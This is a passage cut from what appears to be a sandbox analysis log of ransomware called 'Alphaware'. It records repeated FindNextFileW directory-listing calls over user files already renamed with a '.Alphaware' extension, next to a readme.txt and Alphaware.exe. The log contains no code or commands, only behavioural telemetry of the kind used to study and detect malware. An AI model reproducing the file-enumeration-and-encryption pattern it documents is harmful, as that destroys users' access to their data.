ftCreationTime.dwLowDateTime=0x7a0d1f70, ftCreationTime.dwHighDateTime=0x1d966e3, ftLastAccessTime.dwLowDateTime=0x884587a0, ftLastAccessTime.dwHighDateTime=0x1d968f3, ftLastWriteTime.dwLowDateTime=0x8214c920, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1e620, dwReserved0=0x0, dwReserved1=0x0, cFileName="IPAZp7HIeyfBa.avi.Alphaware", cAlternateFileName="IPAZP7~1.ALP")) returned 1 [0081.941] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x76200920, ftCreationTime.dwHighDateTime=0x1d96988, ftLastAccessTime.dwLowDateTime=0xc8474ef0, ftLastAccessTime.dwHighDateTime=0x1d96d09, ftLastWriteTime.dwLowDateTime=0x82198be0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x158a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="j 99Z9MOpk.pdf.Alphaware", cAlternateFileName="J99Z9M~1.ALP")) returned 1 [0081.941] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa64186c0, ftCreationTime.dwHighDateTime=0x1d973b4, ftLastAccessTime.dwLowDateTime=0x82a38ef0, ftLastAccessTime.dwHighDateTime=0x1d97618, ftLastWriteTime.dwLowDateTime=0x8220b000, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xef60, dwReserved0=0x0, dwReserved1=0x0, cFileName="JmY86mr.swf.Alphaware", cAlternateFileName="JMY86M~1.ALP")) returned 1 [0081.941] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3a645f0, ftCreationTime.dwHighDateTime=0x1d970cf, ftLastAccessTime.dwLowDateTime=0xa0f3fbd0, ftLastAccessTime.dwHighDateTime=0x1d971d4, ftLastWriteTime.dwLowDateTime=0xa0f3fbd0, ftLastWriteTime.dwHighDateTime=0x1d971d4, nFileSizeHigh=0x0, nFileSizeLow=0x115f4, dwReserved0=0x0, dwReserved1=0x0, cFileName="jNMMi.ots", cAlternateFileName="")) returned 1 [0081.941] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce564210, ftCreationTime.dwHighDateTime=0x1d97560, ftLastAccessTime.dwLowDateTime=0x34677f10, ftLastAccessTime.dwHighDateTime=0x1d975a2, ftLastWriteTime.dwLowDateTime=0x822572c0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xf1c8, dwReserved0=0x0, dwReserved1=0x0, cFileName="kbuOLBA.swf.Alphaware", cAlternateFileName="KBUOLB~1.ALP")) returned 1 [0081.942] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c1b19f0, ftCreationTime.dwHighDateTime=0x1d96657, ftLastAccessTime.dwLowDateTime=0x2adc7f00, ftLastAccessTime.dwHighDateTime=0x1d96831, ftLastWriteTime.dwLowDateTime=0x822c96e0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x64a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="KMPe82eGM5iAzO PVI.mp3.Alphaware", cAlternateFileName="KMPE82~1.ALP")) returned 1 [0081.942] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf8f1ece0, ftCreationTime.dwHighDateTime=0x1d96ee9, ftLastAccessTime.dwLowDateTime=0xd86d5fb0, ftLastAccessTime.dwHighDateTime=0x1d97171, ftLastWriteTime.dwLowDateTime=0x82361c60, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x9574, dwReserved0=0x0, dwReserved1=0x0, cFileName="MKPZbzGpKYHPVsXosEp3.mp3.Alphaware", cAlternateFileName="MKPZBZ~1.ALP")) returned 1 [0081.942] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5181d1d0, ftCreationTime.dwHighDateTime=0x1d970ee, ftLastAccessTime.dwLowDateTime=0xcabd79d0, ftLastAccessTime.dwHighDateTime=0x1d972c1, ftLastWriteTime.dwLowDateTime=0x823adf20, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x5308, dwReserved0=0x0, dwReserved1=0x0, cFileName="MNGJ sodzb1khxMh.mp4.Alphaware", cAlternateFileName="MNGJSO~1.ALP")) returned 1 [0081.942] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x46c6b0d0, ftCreationTime.dwHighDateTime=0x1d96abd, ftLastAccessTime.dwLowDateTime=0x98d5c7c0, ftLastAccessTime.dwHighDateTime=0x1d96c9e, ftLastWriteTime.dwLowDateTime=0x823fa1e0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x156c8, dwReserved0=0x0, dwReserved1=0x0, cFileName="mvpq.xls.Alphaware", cAlternateFileName="MVPQXL~1.ALP")) returned 1 [0081.942] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd2ab00, ftCreationTime.dwHighDateTime=0x1d96ed7, ftLastAccessTime.dwLowDateTime=0x50250fa0, ftLastAccessTime.dwHighDateTime=0x1d9741d, ftLastWriteTime.dwLowDateTime=0x8246c600, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x13108, dwReserved0=0x0, dwReserved1=0x0, cFileName="mxWMxpSlb1Z2y3xfhO0.swf.Alphaware", cAlternateFileName="MXWMXP~1.ALP")) returned 1 [0081.942] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5c9986a0, ftCreationTime.dwHighDateTime=0x1d9743e, ftLastAccessTime.dwLowDateTime=0x990eef10, ftLastAccessTime.dwHighDateTime=0x1d97634, ftLastWriteTime.dwLowDateTime=0x82492760, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x3e48, dwReserved0=0x0, dwReserved1=0x0, cFileName="oa aQQjrX6y_jTlap6.png.Alphaware", cAlternateFileName="OAAQQJ~1.ALP")) returned 1 [0081.942] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xafdd0830, ftCreationTime.dwHighDateTime=0x1d96824, ftLastAccessTime.dwLowDateTime=0xe04cd250, ftLastAccessTime.dwHighDateTime=0x1d96cbd, ftLastWriteTime.dwLowDateTime=0x824dea20, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x15bf4, dwReserved0=0x0, dwReserved1=0x0, cFileName="OYZWN3-fBul2M9U.wav.Alphaware", cAlternateFileName="OYZWN3~1.ALP")) returned 1 [0081.942] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb901750, ftCreationTime.dwHighDateTime=0x1d96d3c, ftLastAccessTime.dwLowDateTime=0xfe05c0b0, ftLastAccessTime.dwHighDateTime=0x1d974db, ftLastWriteTime.dwLowDateTime=0x8252ace0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x5074, dwReserved0=0x0, dwReserved1=0x0, cFileName="PYDVqXrN.mkv.Alphaware", cAlternateFileName="PYDVQX~1.ALP")) returned 1 [0081.942] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x814cd5a0, ftCreationTime.dwHighDateTime=0x1d9897a, ftLastAccessTime.dwLowDateTime=0x814cd5a0, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x814cd5a0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x49d, dwReserved0=0x0, dwReserved1=0x0, cFileName="readme.txt", cAlternateFileName="")) returned 1 [0081.942] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe1bd4770, ftCreationTime.dwHighDateTime=0x1d974ae, ftLastAccessTime.dwLowDateTime=0xfca44b10, ftLastAccessTime.dwHighDateTime=0x1d9767f, ftLastWriteTime.dwLowDateTime=0x8259d100, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xc4c8, dwReserved0=0x0, dwReserved1=0x0, cFileName="rmPQA vuvasucn14.mkv.Alphaware", cAlternateFileName="RMPQAV~1.ALP")) returned 1 [0081.942] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35a130c0, ftCreationTime.dwHighDateTime=0x1d973a3, ftLastAccessTime.dwLowDateTime=0xff802ae0, ftLastAccessTime.dwHighDateTime=0x1d9750b, ftLastWriteTime.dwLowDateTime=0x825c3260, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x8b48, dwReserved0=0x0, dwReserved1=0x0, cFileName="s4xZHJNmFEW_-to_l.xls.Alphaware", cAlternateFileName="S4XZHJ~1.ALP")) returned 1 [0081.942] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f8084c0, ftCreationTime.dwHighDateTime=0x1d96ee5, ftLastAccessTime.dwLowDateTime=0x82d7f9e0, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x82d7f9e0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="UKlsVP0OeoLUyu0aA", cAlternateFileName="UKLSVP~1")) returned 1 [0081.943] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2c7325e0, ftCreationTime.dwHighDateTime=0x1d966c3, ftLastAccessTime.dwLowDateTime=0x627aa2b0, ftLastAccessTime.dwHighDateTime=0x1d97002, ftLastWriteTime.dwLowDateTime=0x8260f520, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1288, dwReserved0=0x0, dwReserved1=0x0, cFileName="Vjc3e20l.jpg.Alphaware", cAlternateFileName="VJC3E2~1.ALP")) returned 1 [0081.943] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbed10810, ftCreationTime.dwHighDateTime=0x1d96d7d, ftLastAccessTime.dwLowDateTime=0xc5a4d90, ftLastAccessTime.dwHighDateTime=0x1d97656, ftLastWriteTime.dwLowDateTime=0x8265b7e0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x189b4, dwReserved0=0x0, dwReserved1=0x0, cFileName="Vxbet57tOqM.png.Alphaware", cAlternateFileName="VXBET5~1.ALP")) returned 1 [0081.943] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8d9f3610, ftCreationTime.dwHighDateTime=0x1d96f3d, ftLastAccessTime.dwLowDateTime=0x88683230, ftLastAccessTime.dwHighDateTime=0x1d97525, ftLastWriteTime.dwLowDateTime=0x826a7aa0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x10b48, dwReserved0=0x0, dwReserved1=0x0, cFileName="Wd6KHPvLn hvANgS.mp3.Alphaware", cAlternateFileName="WD6KHP~1.ALP")) returned 1 [0081.943] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe37a4f0, ftCreationTime.dwHighDateTime=0x1d96643, ftLastAccessTime.dwLowDateTime=0xd9cd9ba0, ftLastAccessTime.dwHighDateTime=0x1d96d42, ftLastWriteTime.dwLowDateTime=0x82719ec0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x5034, dwReserved0=0x0, dwReserved1=0x0, cFileName="WQTdEEFonuZ7KxbDBX.pps.Alphaware", cAlternateFileName="WQTDEE~1.ALP")) returned 1 [0081.943] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56579b70, ftCreationTime.dwHighDateTime=0x1d9695c, ftLastAccessTime.dwLowDateTime=0xf3b0e690, ftLastAccessTime.dwHighDateTime=0x1d97313, ftLastWriteTime.dwLowDateTime=0x82766180, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x20c34, dwReserved0=0x0, dwReserved1=0x0, cFileName="xfj_k_QyvZX0.gif.Alphaware", cAlternateFileName="XFJ_K_~1.ALP")) returned 1 [0081.943] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0081.943] FindClose (in: hFindFile=0xd8a2b0 | out: hFindFile=0xd8a2b0) returned 1 [0081.943] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e938) returned 1 [0081.943] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23eb58) returned 1 [0081.949] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ec38) returned 1 [0081.949] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x82766180, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x82766180, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0081.949] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb238c070, ftCreationTime.dwHighDateTime=0x1d9673d, ftLastAccessTime.dwLowDateTime=0xe75bdff0, ftLastAccessTime.dwHighDateTime=0x1d9741a, ftLastWriteTime.dwLowDateTime=0x8145b180, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xc34, dwReserved0=0x0, dwReserved1=0x0, cFileName="1YPPAA.jpg.Alphaware", cAlternateFileName="1YPPAA~1.ALP")) returned 1 [0081.949] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f24b70, ftCreationTime.dwHighDateTime=0x1d972c9, ftLastAccessTime.dwLowDateTime=0x18583e30, ftLastAccessTime.dwHighDateTime=0x1d973c8, ftLastWriteTime.dwLowDateTime=0x81bcb640, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1b8b4, dwReserved0=0x0, dwReserved1=0x0, cFileName="5DZrM2msfwaj.xls.Alphaware", cAlternateFileName="5DZRM2~1.ALP")) returned 1 [0081.950] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x43539140, ftCreationTime.dwHighDateTime=0x1d9767d, ftLastAccessTime.dwLowDateTime=0xcbb3af70, ftLastAccessTime.dwHighDateTime=0x1d9768c, ftLastWriteTime.dwLowDateTime=0x81d222a0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x5eb4, dwReserved0=0x0, dwReserved1=0x0, cFileName="6UV9xBZAU7ALhdXD5SwN.mp4.Alphaware", cAlternateFileName="6UV9XB~1.ALP")) returned 1 [0081.950] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc675d770, ftCreationTime.dwHighDateTime=0x1d973a5, ftLastAccessTime.dwLowDateTime=0xdad16ef0, ftLastAccessTime.dwHighDateTime=0x1d97404, ftLastWriteTime.dwLowDateTime=0x81dba820, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x18960, dwReserved0=0x0, dwReserved1=0x0, cFileName="6XFeOIrP-7F1BPJ.mp3.Alphaware", cAlternateFileName="6XFEOI~1.ALP")) returned 1 [0081.950] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x92de0080, ftCreationTime.dwHighDateTime=0x1d97379, ftLastAccessTime.dwLowDateTime=0x699b1a00, ftLastAccessTime.dwHighDateTime=0x1d97531, ftLastWriteTime.dwLowDateTime=0x81e52da0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x211c8, dwReserved0=0x0, dwReserved1=0x0, cFileName="8-6P.wav.Alphaware", cAlternateFileName="8-6PWA~1.ALP")) returned 1 [0081.950] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e2bccb0, ftCreationTime.dwHighDateTime=0x1d97225, ftLastAccessTime.dwLowDateTime=0xd06c8650, ftLastAccessTime.dwHighDateTime=0x1d9744c, ftLastWriteTime.dwLowDateTime=0x81eeb320, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x14934, dwReserved0=0x0, dwReserved1=0x0, cFileName="9g0 rDMpBlzVC.swf.Alphaware", cAlternateFileName="9G0RDM~1.ALP")) returned 1 [0081.950] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50473680, ftCreationTime.dwHighDateTime=0x1d9897a, ftLastAccessTime.dwLowDateTime=0x50dfcd00, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x9ead0300, ftLastWriteTime.dwHighDateTime=0x1d98983, nFileSizeHigh=0x0, nFileSizeLow=0x10d800, dwReserved0=0x0, dwReserved1=0x0, cFileName="Alphaware.exe", cAlternateFileName="ALPHAW~1.EXE")) returned 1 [0081.950] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x852fa510, ftCreationTime.dwHighDateTime=0x1d96d25, ftLastAccessTime.dwLowDateTime=0xff631450, ftLastAccessTime.dwHighDateTime=0x1d96d68, ftLastWriteTime.dwLowDateTime=0x81f5d740, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xbfc8, dwReserved0=0x0, dwReserved1=0x0, cFileName="c-jf 0ya1RIcN.mp4.Alphaware", cAlternateFileName="C-JF0Y~1.ALP")) returned 1 [0081.950] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2618a290, ftCreationTime.dwHighDateTime=0x1d96e09, ftLastAccessTime.dwLowDateTime=0x2bbd27c0, ftLastAccessTime.dwHighDateTime=0x1d96f94, ftLastWriteTime.dwLowDateTime=0x81fa9a00, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x14eb4, dwReserved0=0x0, dwReserved1=0x0, cFileName="cZ6ivAAtP9f8.m4a.Alphaware", cAlternateFileName="CZ6IVA~1.ALP")) returned 1 [0081.950] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x8201be20, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x248, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini.Alphaware", cAlternateFileName="DESKTO~1.ALP")) returned 1 [0081.950] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x804bb920, ftCreationTime.dwHighDateTime=0x1d972df, ftLastAccessTime.dwLowDateTime=0x1e323290, ftLastAccessTime.dwHighDateTime=0x1d97614, ftLastWriteTime.dwLowDateTime=0x820680e0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x9008, dwReserved0=0x0, dwReserved1=0x0, cFileName="ELJrj3fRtgYOpT3c_m.mp4.Alphaware", cAlternateFileName="ELJRJ3~1.ALP")) returned 1 [0081.950] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9df57b0, ftCreationTime.dwHighDateTime=0x1d9684e, ftLastAccessTime.dwLowDateTime=0xcd8c2700, ftLastAccessTime.dwHighDateTime=0x1d96ddb, ftLastWriteTime.dwLowDateTime=0x820da500, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1fda0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fWyG0v4r7aIxC.gif.Alphaware", cAlternateFileName="FWYG0V~1.ALP")) returned 1 [0081.950] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7a0d1f70, ftCreationTime.dwHighDateTime=0x1d966e3, ftLastAccessTime.dwLowDateTime=0x884587a0, ftLastAccessTime.dwHighDateTime=0x1d968f3, ftLastWriteTime.dwLowDateTime=0x8214c920, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1e620, dwReserved0=0x0, dwReserved1=0x0, cFileName="IPAZp7HIeyfBa.avi.Alphaware", cAlternateFileName="IPAZP7~1.ALP")) returned 1 [0081.950] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x76200920, ftCreationTime.dwHighDateTime=0x1d96988, ftLastAccessTime.dwLowDateTime=0xc8474ef0, ftLastAccessTime.dwHighDateTime=0x1d96d09, ftLastWriteTime.dwLowDateTime=0x82198be0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x158a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="j 99Z9MOpk.pdf.Alphaware", cAlternateFileName="J99Z9M~1.ALP")) returned 1 [0081.950] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa64186c0, ftCreationTime.dwHighDateTime=0x1d973b4, ftLastAccessTime.dwLowDateTime=0x82a38ef0, ftLastAccessTime.dwHighDateTime=0x1d97618, ftLastWriteTime.dwLowDateTime=0x8220b000, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xef60, dwReserved0=0x0, dwReserved1=0x0, cFileName="JmY86mr.swf.Alphaware", cAlternateFileName="JMY86M~1.ALP")) returned 1 [0081.950] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3a645f0, ftCreationTime.dwHighDateTime=0x1d970cf, ftLastAccessTime.dwLowDateTime=0xa0f3fbd0, ftLastAccessTime.dwHighDateTime=0x1d971d4, ftLastWriteTime.dwLowDateTime=0xa0f3fbd0, ftLastWriteTime.dwHighDateTime=0x1d971d4, nFileSizeHigh=0x0, nFileSizeLow=0x115f4, dwReserved0=0x0, dwReserved1=0x0, cFileName="jNMMi.ots", cAlternateFileName="")) returned 1 [0081.950] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce564210, ftCreationTime.dwHighDateTime=0x1d97560, ftLastAccessTime.dwLowDateTime=0x34677f10, ftLastAccessTime.dwHighDateTime=0x1d975a2, ftLastWriteTime.dwLowDateTime=0x822572c0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xf1c8, dwReserved0=0x0, dwReserved1=0x0, cFileName="kbuOLBA.swf.Alphaware", cAlternateFileName="KBUOLB~1.ALP")) returned 1 [0081.950] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c1b19f0, ftCreationTime.dwHighDateTime=0x1d96657, ftLastAccessTime.dwLowDateTime=0x2adc7f00, ftLastAccessTime.dwHighDateTime=0x1d96831, ftLastWriteTime.dwLowDateTime=0x822c96e0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x64a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="KMPe82eGM5iAzO PVI.mp3.Alphaware", cAlternateFileName="KMPE82~1.ALP")) returned 1 [0081.950] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf8f1ece0, ftCreationTime.dwHighDateTime=0x1d96ee9, ftLastAccessTime.dwLowDateTime=0xd86d5fb0, ftLastAccessTime.dwHighDateTime=0x1d97171, ftLastWriteTime.dwLowDateTime=0x82361c60, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x9574, dwReserved0=0x0, dwReserved1=0x0, cFileName="MKPZbzGpKYHPVsXosEp3.mp3.Alphaware", cAlternateFileName="MKPZBZ~1.ALP")) returned 1 [0081.950] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5181d1d0, ftCreationTime.dwHighDateTime=0x1d970ee, ftLastAccessTime.dwLowDateTime=0xcabd79d0, ftLastAccessTime.dwHighDateTime=0x1d972c1, ftLastWriteTime.dwLowDateTime=0x823adf20, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x5308, dwReserved0=0x0, dwReserved1=0x0, cFileName="MNGJ sodzb1khxMh.mp4.Alphaware", cAlternateFileName="MNGJSO~1.ALP")) returned 1 [0081.951] FindNextFileW (in: 